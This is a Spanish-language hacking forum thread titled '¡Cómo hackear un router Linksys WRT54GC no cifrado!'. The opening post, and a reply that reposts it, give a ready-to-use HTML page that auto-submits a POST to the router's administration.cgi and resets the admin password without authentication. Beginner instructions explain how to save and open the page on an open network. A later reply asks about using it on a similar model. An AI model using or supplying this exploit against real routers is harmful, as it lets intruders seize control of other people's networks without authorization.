elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!  (Leído 8,856 veces)
RedKnight

Desconectado Desconectado

Mensajes: 18



Ver Perfil
¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
« en: 3 Mayo 2009, 19:58 »

El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código:
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info




En línea

Ahora sólo uso la cuenta con el nick BlackNightmare :p

genomma

Desconectado Desconectado

Mensajes: 93


Ver Perfil
Re: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
« Respuesta #1 en: 26 Junio 2010, 10:28 »

El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código:
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info




YO tengo un Linksys WRT54G seriviría este Script????   que modificaciones le tengo que hacer si mi direccion es 192.168.1.1????


En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
« Respuesta #2 en: 26 Junio 2010, 10:35 »

Como ya dice el compañero, es la que se usa por defecto, lee un poco el codigo que aunque no sepas programar se sobre-entiende, que es Html tio...

Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Intentan "hackear" mi web
Hacking Básico
y2jr 5 4,189 Último mensaje 7 Febrero 2011, 18:19
por xassiz~
Router TP-Link "No se ha podido comprobar la configuración del router"
Redes
Helicot 0 5,404 Último mensaje 22 Abril 2012, 18:13
por Helicot
"SALT" en los algoritmos de cifrado DES y AES
Criptografía
chelo87_ec 1 2,806 Último mensaje 11 Diciembre 2013, 20:41
por ANELKAOS
"Basta con buscar en Google": cómo cualquiera puede 'hackear' un dron militar
Noticias
wolfbcn 3 1,675 Último mensaje 1 Mayo 2015, 06:48
por R33B0T
Cómo "hackear" Windows 10 ???
Hacking Ético
Depredador 6 1,318 Último mensaje 25 Abril 2019, 20:07
por Depredador
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines